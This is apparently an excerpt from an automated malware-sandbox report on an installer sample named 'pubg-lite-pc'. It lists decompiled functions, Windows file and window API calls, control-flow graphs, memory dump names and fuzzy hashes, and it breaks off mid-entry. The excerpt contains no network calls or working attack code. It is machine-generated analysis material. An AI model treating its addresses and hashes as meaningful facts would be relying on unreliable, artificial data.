                                                                                                0x6d982825
                                                                                                0x6d982831
                                                                                                0x6d98284b
                                                                                                0x6d98284b

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,E85BFA76,?), ref: 6D9825CC
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000), ref: 6D982655
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 6D98269A
                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 6D9826A3
                                                                                                • CloseHandle.KERNEL32(?), ref: 6D98281F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointerReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3644197346-0
                                                                                                • Opcode ID: 94970ef28050ea2c87ff6881804d29f36b55d2dfe680ef8642d8ed77dfe4bb9c
                                                                                                • Instruction ID: 1ef6ca8cacddae8c937138039875652570459abbc5e02da881011f67ae0ba9e0
                                                                                                • Opcode Fuzzy Hash: 94970ef28050ea2c87ff6881804d29f36b55d2dfe680ef8642d8ed77dfe4bb9c
                                                                                                • Instruction Fuzzy Hash: 9EA17D71D04249DFDB21CFA8CC44BAEBBB8FF49B04F108529E911AB285D774E909CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D13A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 224fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1438 9d13a0-9d13dd 1439 9d13df-9d13e9 call 928c70 1438->1439 1440 9d13eb-9d13ed call 9db9d0 1438->1440 1439->1440 1444 9d13f2-9d13f7 1440->1444 1445 9d13fd-9d1408 1444->1445 1446 9d14e2-9d14e4 1444->1446 1449 9d1438-9d143f 1445->1449 1450 9d140a-9d1422 call 9b35e0 1445->1450 1447 9d14e6 1446->1447 1448 9d1503-9d1507 1446->1448 1453 9d14ec-9d1501 call 9b3a00 1447->1453 1454 9d14e8-9d14ea 1447->1454 1455 9d150d-9d150f 1448->1455 1456 9d161f-9d1632 1448->1456 1451 9d14c9-9d14df 1449->1451 1452 9d1445-9d144c call 9292f0 1449->1452 1463 9d1424 1450->1463 1464 9d1427-9d1432 1450->1464 1468 9d1635-9d163f call 928fc0 1452->1468 1469 9d1452-9d1479 call 939140 1452->1469 1453->1455 1454->1448 1454->1453 1458 9d1512-9d1519 call 9292f0 1455->1458 1458->1468 1470 9d151f-9d158c call 9287a0 CreateFileW call 9affb0 1458->1470 1463->1464 1464->1446 1464->1449 1480 9d1499-9d14bf call 9e6300 1469->1480 1481 9d147b-9d147d 1469->1481 1490 9d158e 1470->1490 1491 9d15aa-9d15b5 1470->1491 1480->1451 1489 9d14c1-9d14c4 1480->1489 1484 9d1480-9d1489 1481->1484 1484->1484 1485 9d148b-9d1494 call 939140 1484->1485 1485->1480 1489->1451 1492 9d1598-9d15a8 1490->1492 1493 9d1590-9d1596 1490->1493 1494 9d15b8-9d15df SetFilePointer SetEndOfFile 1491->1494 1492->1494 1493->1491 1493->1492 1495 9d15ef-9d1604 1494->1495 1496 9d15e1-9d15e8 CloseHandle 1494->1496 1497 9d160e-9d1619 1495->1497 1498 9d1606-9d1609 1495->1498 1496->1495 1497->1456 1497->1458 1498->1497
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 009D1561
                                                                                                • SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 009D15C0
                                                                                                • SetEndOfFile.KERNEL32(?), ref: 009D15C9
                                                                                                • CloseHandle.KERNEL32(?), ref: 009D15E2
                                                                                                Strings
                                                                                                • %sholder%d.aiph, xrefs: 009D153D
                                                                                                • Not enough disk space to extract file:, xrefs: 009D146B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointer
                                                                                                • String ID: %sholder%d.aiph$Not enough disk space to extract file:
                                                                                                • API String ID: 22866420-929304071
                                                                                                • Opcode ID: 34218c96caf4bd93b076d5b364d3f4157572ed6ce22f4e8c522f7fbbe8b7d25c
                                                                                                • Instruction ID: 716959583da448a4378d57e14e7577917302a073f565c8d9939aae09976fea05
                                                                                                • Opcode Fuzzy Hash: 34218c96caf4bd93b076d5b364d3f4157572ed6ce22f4e8c522f7fbbe8b7d25c
                                                                                                • Instruction Fuzzy Hash: A6819272A40205AFDB10DFA8CC45BAEB7B9FF85320F14861AF91597391DB75D901CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EE350 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1499 9ee350-9ee39b call 9d1790 1502 9ee39d-9ee3a2 1499->1502 1503 9ee3a7-9ee3b5 1499->1503 1504 9ee551-9ee57b call a45f29 1502->1504 1505 9ee3c0-9ee3e1 1503->1505 1507 9ee3eb-9ee402 SetFilePointer 1505->1507 1508 9ee3e3-9ee3e9 1505->1508 1510 9ee404-9ee40c GetLastError 1507->1510 1511 9ee412-9ee427 ReadFile 1507->1511 1508->1507 1510->1511 1512 9ee54c 1510->1512 1511->1512 1513 9ee42d-9ee434 1511->1513 1512->1504 1513->1512 1514 9ee43a-9ee44b 1513->1514 1514->1505 1515 9ee451-9ee45d 1514->1515 1516 9ee460-9ee464 1515->1516 1517 9ee466-9ee46f 1516->1517 1518 9ee471-9ee475 1516->1518 1517->1516 1517->1518 1519 9ee498-9ee49a 1518->1519 1520 9ee477-9ee47d 1518->1520 1522 9ee49d-9ee49f 1519->1522 1520->1519 1521 9ee47f-9ee482 1520->1521 1523 9ee494-9ee496 1521->1523 1524 9ee484-9ee48a 1521->1524 1525 9ee4b4-9ee4b6 1522->1525 1526 9ee4a1-9ee4a4 1522->1526 1523->1522 1524->1519 1527 9ee48c-9ee492 1524->1527 1529 9ee4b8-9ee4c1 1525->1529 1530 9ee4c6-9ee4ec SetFilePointer 1525->1530 1526->1515 1528 9ee4a6-9ee4af 1526->1528 1527->1519 1527->1523 1528->1505 1529->1505 1530->1512 1531 9ee4ee-9ee503 ReadFile 1530->1531 1531->1512 1532 9ee505-9ee509 1531->1532 1532->1512 1533 9ee50b-9ee515 1532->1533 1534 9ee52f-9ee534 1533->1534 1535 9ee517-9ee51d 1533->1535 1534->1504 1535->1534 1536 9ee51f-9ee527 1535->1536 1536->1534 1537 9ee529-9ee52d 1536->1537 1537->1534 1538 9ee536-9ee54a 1537->1538 1538->1504
                                                                                                APIs
                                                                                                • SetFilePointer.KERNEL32(?,-00000400,?,00000002,00000400,F4D3B90A,?,?,?,?,?), ref: 009EE3F6
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009EE404
                                                                                                • ReadFile.KERNEL32(?,00000000,00000400,000000FF,00000000,?,?,?,?), ref: 009EE41F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$ErrorLastPointerRead
                                                                                                • String ID: ADVINSTSFX
                                                                                                • API String ID: 64821003-4038163286
                                                                                                • Opcode ID: d4ae15bf814be447adf9b095577c53e8f6465eba38d2c95f9bc1c89d10dc4f3f
                                                                                                • Instruction ID: 3a1fb7d8bcbd97a8b913cf0df50f65ca2176a2b5edeb6d6ee0e963bc6ec11d35
                                                                                                • Opcode Fuzzy Hash: d4ae15bf814be447adf9b095577c53e8f6465eba38d2c95f9bc1c89d10dc4f3f
                                                                                                • Instruction Fuzzy Hash: C5611571A002899BDF02CF6AC884BBEBBBAFF55314F244665E405A7391E734ED41CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00931031 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CallWindowProcW.USER32(?,?,?,?,00000024), ref: 009310D0
                                                                                                • GetWindowLongW.USER32(?,000000FC), ref: 009310E5
                                                                                                • CallWindowProcW.USER32(?,?,00000082,?,00000024), ref: 009310FB
                                                                                                • GetWindowLongW.USER32(?,000000FC), ref: 00931115
                                                                                                • SetWindowLongW.USER32(?,000000FC,?), ref: 00931125
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$CallProc
                                                                                                • String ID: $
                                                                                                • API String ID: 513923721-3993045852
                                                                                                • Opcode ID: e325d60197d365fd943dfb2dcf7db2d6addea65a4db6f7cdaf62208b2c72dc8a
                                                                                                • Instruction ID: cf19f1c4ae99b57df15e6f83cbe0e02bf20c835d3f73a5ccbea2560fb01d7c77
                                                                                                • Opcode Fuzzy Hash: e325d60197d365fd943dfb2dcf7db2d6addea65a4db6f7cdaf62208b2c72dc8a
                                                                                                • Instruction Fuzzy Hash: 1A410171208700AFC720DF59D884A5BBBF9FB88724F504A1DF59A836A0D772E849CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CF6A0 Relevance: 9.4, APIs: 6, Instructions: 409fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000,F4D3B90A,?), ref: 009CF707
                                                                                                • GetLastError.KERNEL32 ref: 009CFA0B
                                                                                                • GetLastError.KERNEL32 ref: 009CFA6C
                                                                                                • GetLastError.KERNEL32 ref: 009CF716
                                                                                                  • Part of subcall function 009B6F00: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,F4D3B90A,?,00000000), ref: 009B6F4B
                                                                                                  • Part of subcall function 009B6F00: GetLastError.KERNEL32(?,00000000), ref: 009B6F55
                                                                                                • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 009CF814
                                                                                                • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 009CF86B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                                                • String ID:
                                                                                                • API String ID: 3903527278-0
                                                                                                • Opcode ID: da5d20df60acf5d8190f016b17c05a1baaf73204421cb6ad054a8210b3c4cf1f
                                                                                                • Instruction ID: e808c0df1909c9fce1b4e8315a28224b02a0f1bc1ed5a4bf485ae302002cba81
                                                                                                • Opcode Fuzzy Hash: da5d20df60acf5d8190f016b17c05a1baaf73204421cb6ad054a8210b3c4cf1f
                                                                                                • Instruction Fuzzy Hash: 8AF17D71D006099FDB00CFA8C955BEDFBB5FF48320F148269E815A7391E774AA45CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CFB80 Relevance: 9.4, APIs: 6, Instructions: 354fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000,F4D3B90A,?,?,00000002,?,?,?,?,?,?,00000000,00A864D2), ref: 009CFBD7
                                                                                                • GetLastError.KERNEL32(?,00000002), ref: 009CFE69
                                                                                                • GetLastError.KERNEL32(?,00000002), ref: 009CFF13
                                                                                                • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,?,00000000,00A864D2,000000FF,?,009CEBAA,00000010), ref: 009CFBE6
                                                                                                  • Part of subcall function 009B6F00: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,F4D3B90A,?,00000000), ref: 009B6F4B
                                                                                                  • Part of subcall function 009B6F00: GetLastError.KERNEL32(?,00000000), ref: 009B6F55
                                                                                                • ReadFile.KERNEL32(?,00000000,00000008,80070057,00000000,?,00000002), ref: 009CFCA8
                                                                                                • ReadFile.KERNEL32(?,F4D3B90A,00000000,00000000,00000000,00000001,?,00000002), ref: 009CFD25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$File$Read$FormatMessagePointer
                                                                                                • String ID:
                                                                                                • API String ID: 3903527278-0
                                                                                                • Opcode ID: 7491d31e38a3ac01789d01f94814e7233edaa83b2c13c515ff1abc33f5e818dd
                                                                                                • Instruction ID: 3997688b5112914c852edf150c4c4c9513849d6ff39eb2ff91d6cafed0d4b9bb
                                                                                                • Opcode Fuzzy Hash: 7491d31e38a3ac01789d01f94814e7233edaa83b2c13c515ff1abc33f5e818dd
                                                                                                • Instruction Fuzzy Hash: 70D1A371D00209DFDB00DFA8D895BADF7B6FF44314F148269E815AB392EB74A905CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D972380 Relevance: 9.2, APIs: 6, Instructions: 196fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 81%
                                                                                                			E6D972380(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				long _v16;
				char _v24;
				signed int _v32;
				struct _OVERLAPPED* _v36;
				struct _OVERLAPPED* _v40;
				char _v56;
				struct _OVERLAPPED* _v60;
				long _v64;
				char _v80;
				char _v104;
				char _v128;
				signed int _v132;
				void _v136;
				long _v140;
				long _v144;
				long _v148;
				struct _OVERLAPPED* _v152;
				intOrPtr _v156;
				void* __ebx;
				signed int _t86;
				signed int _t87;
				WCHAR* _t95;
				void* _t96;
				long _t97;
				void* _t99;
				int _t100;
				void _t111;
				signed int _t112;
				char* _t118;
				void* _t120;
				void* _t121;
				long _t127;
				long _t130;
				void* _t138;
				void* _t143;
				void* _t148;

				_t121 = __ecx;
				_t120 = _t148;
				_v8 =  *((intOrPtr*)(_t120 + 4));
				_t146 = (_t148 - 0x00000008 & 0xfffffff8) + 4;
				_push(0xffffffff);
				_push(0x6d9b6472);
				_push( *[fs:0x0]);
				_push(_t120);
				_t86 =  *0x6d9e5024; // 0xe85bfa76
				_t87 = _t86 ^ (_t148 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_v32 = _t87;
				_push(__edi);
				_push(_t87);
				 *[fs:0x0] =  &_v24;
				_t138 = __ecx;
				_v132 = 0;
				_v40 = 0;
				_v36 = 0;
				_v40 = 0;
				_v36 = 7;
				_v56 = 0;
				_v16 = 0;
				_push( &_v56);
				if(L6D9727C0(_t120, __ecx, __ecx) == 0 || _v40 == 0) {
					_t139 = 1;
					goto L27;
				} else {
					_t95 = __ecx + 4;
					if( *((intOrPtr*)(__ecx + 0x18)) >= 8) {
						_t95 =  *_t95;
					}
					_t96 = CreateFileW(_t95, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					_t143 = _t96;
					_v156 = 0x6d9c8108;
					_v152 = _t143;
					_v16 = 1;
					if(_t143 != 0xffffffff) {
						_v64 = 0;
						_v60 = 0;
						_v64 = 0;
						_v60 = 0xf;
						_v80 = 0;
						_v16 = 2;
						if( *((intOrPtr*)(_t138 + 0x50)) == 0) {
							_t136 =  *((intOrPtr*)(_t138 + 0x4c));
							if( *((intOrPtr*)(_t138 + 0x4c)) == 0) {
								_t110 =  >=  ? _v56 :  &_v56;
								_t111 = L6D974150( &_v104,  >=  ? _v56 :  &_v56, _v40);
								_v136 = _t111;
								_v16 = 4;
								_t130 = 2;
							} else {
								_push(_t121);
								_t119 =  >=  ? _v56 :  &_v56;
								_t111 = L6D974230( &_v128, _t136,  >=  ? _v56 :  &_v56, _v40);
								_v136 = _t111;
								_v16 = 3;
								_t130 = 1;
							}
							_v132 = _t130;
							if( &_v80 != _t111) {
								L6D965610(_t120,  &_v80, _t138);
								_t118 = _v136;
								asm("movups xmm0, [eax]");
								asm("movups [ebp-0x44], xmm0");
								asm("movq xmm0, [eax+0x10]");
								asm("movq [ebp-0x34], xmm0");
								 *(_t118 + 0x10) = 0;
								 *(_t118 + 0x14) = 0xf;
								 *_t118 = 0;
							}
							_v16 = 3;
							_t112 = _v132;
							if((_t112 & 0x00000002) != 0) {
								_v132 = _t112 & 0xfffffffd;
								L6D965610(_t120,  &_v104, _t138);
								_t112 = _v132;
							}
							_v16 = 2;
							if((_t112 & 0x00000001) != 0) {
								_v132 = _t112 & 0xfffffffe;
								L6D965610(_t120,  &_v128, _t138);
							}
						}
						_t97 = GetFileSize(_t143, 0);
						_v144 = _t97;
						if( *((intOrPtr*)(_t138 + 0x50)) != 0) {
							_v136 = 0xfeff;
							_v140 = 0;
							WriteFile(_t143,  &_v136, 2,  &_v140, 0);
							_t97 = _v144;
						}
						if(_t97 != 0) {
							SetFilePointer(_t143, _t97, 0, 0);
						}
						_v148 = 0;
						if( *((intOrPtr*)(_t138 + 0x50)) == 0) {
							_t127 = _v64;
							_t99 =  >=  ? _v80 :  &_v80;
						} else {
							_t127 = _v40 + _v40;
							_t99 =  >=  ? _v56 :  &_v56;
						}
						_t100 = WriteFile(_t143, _t99, _t127,  &_v148, 0); // executed
						_t139 = _t100;
						_v16 = 1;
						L6D965610(_t120,  &_v80, _t100);
					} else {
						_t139 = 0;
					}
					_v16 = 0;
					_v156 = 0x6d9c8108;
					if(_t143 != 0) {
						CloseHandle(_t143);
						_v152 = 0;
					}
					L27:
					_v16 = 0xffffffff;
					L6D965CF0(_t120,  &_v56, _t139);
					 *[fs:0x0] = _v24;
					return L6D98A13F(_v32 ^ _t146);
				}
			}








































                                                                                                0x6d972380
                                                                                                0x6d972381
                                                                                                0x6d972390
                                                                                                0x6d972394
                                                                                                0x6d972396
                                                                                                0x6d972398
                                                                                                0x6d9723a3
                                                                                                0x6d9723a4
                                                                                                0x6d9723ab
                                                                                                0x6d9723b0
                                                                                                0x6d9723b2
                                                                                                0x6d9723b6
                                                                                                0x6d9723b7
                                                                                                0x6d9723bb
                                                                                                0x6d9723c1
                                                                                                0x6d9723c3
                                                                                                0x6d9723cc
                                                                                                0x6d9723d3
                                                                                                0x6d9723da
                                                                                                0x6d9723e1
                                                                                                0x6d9723e8
                                                                                                0x6d9723ec
                                                                                                0x6d9723f2
                                                                                                0x6d9723fa
                                                                                                0x6d972601
                                                                                                0x00000000
                                                                                                0x6d97240a
                                                                                                0x6d97240e
                                                                                                0x6d972411
                                                                                                0x6d972413
                                                                                                0x6d972413
                                                                                                0x6d972428
                                                                                                0x6d97242e
                                                                                                0x6d972430
                                                                                                0x6d97243a
                                                                                                0x6d972440
                                                                                                0x6d972447
                                                                                                0x6d972450
                                                                                                0x6d972457
                                                                                                0x6d97245e
                                                                                                0x6d972465
                                                                                                0x6d97246c
                                                                                                0x6d972470
                                                                                                0x6d972478
                                                                                                0x6d97247e
                                                                                                0x6d972486
                                                                                                0x6d9724b8
                                                                                                0x6d9724bd
                                                                                                0x6d9724c5
                                                                                                0x6d9724c8
                                                                                                0x6d9724cf
                                                                                                0x6d972488
                                                                                                0x6d97248c
                                                                                                0x6d972490
                                                                                                0x6d972498
                                                                                                0x6d9724a0
                                                                                                0x6d9724a3
                                                                                                0x6d9724a7
                                                                                                0x6d9724a7
                                                                                                0x6d9724d4
                                                                                                0x6d9724dc
                                                                                                0x6d9724de
                                                                                                0x6d9724e3
                                                                                                0x6d9724e6
                                                                                                0x6d9724e9
                                                                                                0x6d9724ed
                                                                                                0x6d9724f2
                                                                                                0x6d9724f7
                                                                                                0x6d9724fe
                                                                                                0x6d972505
                                                                                                0x6d972505
                                                                                                0x6d972508
                                                                                                0x6d97250f
                                                                                                0x6d972514
                                                                                                0x6d97251c
                                                                                                0x6d97251f
                                                                                                0x6d972524
                                                                                                0x6d972524
                                                                                                0x6d972527
                                                                                                0x6d972530
                                                                                                0x6d972538
                                                                                                0x6d97253b
                                                                                                0x6d97253b
                                                                                                0x6d972530
                                                                                                0x6d972543
                                                                                                0x6d97254d
                                                                                                0x6d972553
                                                                                                0x6d97255a
                                                                                                0x6d972566
                                                                                                0x6d97256f
                                                                                                0x6d972575
                                                                                                0x6d972575
                                                                                                0x6d97257d
                                                                                                0x6d972585
                                                                                                0x6d972585
                                                                                                0x6d97258f
                                                                                                0x6d972599
                                                                                                0x6d9725b5
                                                                                                0x6d9725b8
                                                                                                0x6d97259b
                                                                                                0x6d9725a2
                                                                                                0x6d9725a8
                                                                                                0x6d9725a8
                                                                                                0x6d9725c8
                                                                                                0x6d9725ce
                                                                                                0x6d9725d0
                                                                                                0x6d9725d7
                                                                                                0x6d972449
                                                                                                0x6d972449
                                                                                                0x6d972449
                                                                                                0x6d9725dc
                                                                                                0x6d9725e0
                                                                                                0x6d9725ec
                                                                                                0x6d9725ef
                                                                                                0x6d9725f5
                                                                                                0x6d9725f5
                                                                                                0x6d972606
                                                                                                0x6d972606
                                                                                                0x6d972610
                                                                                                0x6d97261a
                                                                                                0x6d972634
                                                                                                0x6d972634

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,E85BFA76,00000001,00000000), ref: 6D972428
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 6D972543
                                                                                                • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 6D97256F
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D972585
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6D9725C8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6D9725EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Write$CloseCreateHandlePointerSize
                                                                                                • String ID:
                                                                                                • API String ID: 3932932802-0
                                                                                                • Opcode ID: 48a70431dd125f13f8faace71e1ec9673f613c38a76763946bfac0735bc4c97d
                                                                                                • Instruction ID: 2459d7ad97938d8f539900e9deada36d23c8defc2d4ca10168ace56c191c419b
                                                                                                • Opcode Fuzzy Hash: 48a70431dd125f13f8faace71e1ec9673f613c38a76763946bfac0735bc4c97d
                                                                                                • Instruction Fuzzy Hash: 1C815D70D14209DFEB21CFA8C955BEEBBB4FF15318F208259D520A7281DB74AA44CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009F0190 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 208COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeW.KERNELBASE(?,F4D3B90A,F4D3B90A,?,00B02450,?,?,009D21F9,?,F4D3B90A,?,?,?,00000000,00A86C25), ref: 009F01F5
                                                                                                • GetFileVersionInfoW.KERNELBASE(?,?,00000000,?,00000000,?,00B02450,?,?,009D21F9,?,F4D3B90A,?,?,?,00000000), ref: 009F0243
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
